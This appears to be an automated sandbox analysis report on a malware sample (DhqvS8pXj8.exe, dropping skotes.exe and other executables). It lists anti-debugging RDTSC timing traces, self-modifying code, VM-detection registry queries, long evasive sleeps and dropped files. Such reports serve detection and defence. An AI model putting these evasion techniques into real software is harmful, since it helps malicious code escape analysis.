Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B092C second address: 50B0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c mov si, 8531h 0x00000010 mov dx, ax 0x00000013 popad 0x00000014 pushad 0x00000015 mov edx, eax 0x00000017 jmp 00007F5BC10B70A4h 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0960 second address: 50B0964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0964 second address: 50B0981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0981 second address: 50B0A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F5BC10A35FAh 0x00000014 jmp 00007F5BC10A3605h 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F5BC10A3600h 0x00000020 sub esi, 3C807758h 0x00000026 jmp 00007F5BC10A35FBh 0x0000002b popfd 0x0000002c popad 0x0000002d movzx eax, bx 0x00000030 popad 0x00000031 mov dword ptr fs:[00000000h], eax 0x00000037 pushad 0x00000038 mov cl, dh 0x0000003a jmp 00007F5BC10A35FAh 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5BC10A3607h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0A14 second address: 50B0A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov bh, 2Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5BC10B70A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0A3C second address: 50B0AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5BC10A3607h 0x00000008 pop esi 0x00000009 call 00007F5BC10A3609h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A35FDh 0x0000001b xor ax, E076h 0x00000020 jmp 00007F5BC10A3601h 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 movzx eax, dx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AA1 second address: 50B0AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F5C32EC6314h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AB2 second address: 50B0AB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0AB8 second address: 50B0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5BC10B70A7h 0x00000012 and eax, 015F7BBEh 0x00000018 jmp 00007F5BC10B70A9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F5BC10B70A0h 0x00000024 or ax, 94B8h 0x00000029 jmp 00007F5BC10B709Bh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [ebp-20h], eax 0x00000033 jmp 00007F5BC10B70A6h 0x00000038 mov ebx, dword ptr [esi] 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov esi, ebx 0x0000003f pushfd 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 and si, 58B6h 0x0000004a jmp 00007F5BC10B70A1h 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0B84 second address: 50B0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0008 second address: 50B000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B000C second address: 50B0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B0012 second address: 50B00B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10B70A6h 0x0000000f push eax 0x00000010 jmp 00007F5BC10B709Bh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F5BC10B70A4h 0x0000001d sbb esi, 3D69CE88h 0x00000023 jmp 00007F5BC10B709Bh 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007F5BC10B70A8h 0x0000002f and si, 30E8h 0x00000034 jmp 00007F5BC10B709Bh 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebp, esp 0x0000003d pushad 0x0000003e pushad 0x0000003f call 00007F5BC10B70A2h 0x00000044 pop esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00B5 second address: 50B00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, 4Bh 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00C4 second address: 50B00C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00C8 second address: 50B00DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	RDTSC instruction interceptor: First address: 50B00DD second address: 50B00E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACD13C second address: ACD142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACD142 second address: ACD162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5BC10B7096h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5BC10B70A3h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC2D1 second address: ACC2F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F5BC10A35F8h 0x0000000b pushad 0x0000000c js 00007F5BC10A35F6h 0x00000012 pushad 0x00000013 popad 0x00000014 push edi 0x00000015 pop edi 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jng 00007F5BC10A35F6h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC2F2 second address: ACC305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5BC10B70ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC305 second address: ACC309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC309 second address: ACC30F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC459 second address: ACC45F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC59C second address: ACC5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jl 00007F5BC10B709Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 jg 00007F5BC10B7096h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F5BC10B709Eh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACC729 second address: ACC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0A7 second address: ACF0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F5BC10B7096h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0B1 second address: ACF0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0B5 second address: ACF0FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F5BC10B70AFh 0x0000000f push ebx 0x00000010 jmp 00007F5BC10B70A7h 0x00000015 pop ebx 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a ja 00007F5BC10B70A4h 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF0FD second address: ACF107 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5BC10A35FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF206 second address: ACF20B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF20B second address: ACF269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 298AC1A2h 0x0000000e mov edx, dword ptr [ebp+122D33FEh] 0x00000014 push 00000003h 0x00000016 mov di, 0B90h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F5BC10A35F8h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000014h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 mov esi, dword ptr [ebp+122D353Ah] 0x0000003c mov si, 1EC8h 0x00000040 push 00000003h 0x00000042 sub di, E20Bh 0x00000047 push 49B6E6D2h 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F5BC10A35FBh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF269 second address: ACF26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF26E second address: ACF296 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5BC10A35FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7649192Eh 0x00000011 mov edx, 2B29BBECh 0x00000016 lea ebx, dword ptr [ebp+12453FD8h] 0x0000001c push eax 0x0000001d push ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF3F0 second address: ACF3F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	RDTSC instruction interceptor: First address: ACF3F4 second address: ACF3FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Special instruction interceptor: First address: 32E763 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Special instruction interceptor: First address: 56378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 94E763 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B8378E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 69DBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 69DB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 84CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Special instruction interceptor: First address: 875810 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 57E8E2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 57C0F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 754D9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Special instruction interceptor: First address: 7AF4D5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: DCDBD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: DCDB0B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: F7CDE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Special instruction interceptor: First address: FA5810 instructions caused by: Self-modifying code

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 2770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 2910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 4910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 61D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Memory allocated: 5840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5060000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5300000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Memory allocated: 5100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 54D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 5660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Memory allocated: 7660000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 1820000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 32B0000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 52B0000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 6A60000 memory reserve \| memory write watch
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Memory allocated: 61D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 2C90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Memory allocated: 29F0000 memory reserve \| memory write watch

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe

Code function: 0_2_05100BE7 rdtsc

0_2_05100BE7

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1101	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1066	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1130	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1113	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1111	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1049	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 1133	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5621	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3656	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6710
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2610
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 590
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4019
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3276
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7047
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3795
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 520
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4144

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	API coverage: 3.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104	Thread sleep count: 1101 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8104	Thread sleep time: -2203101s >= -30000s	Jump to behavior
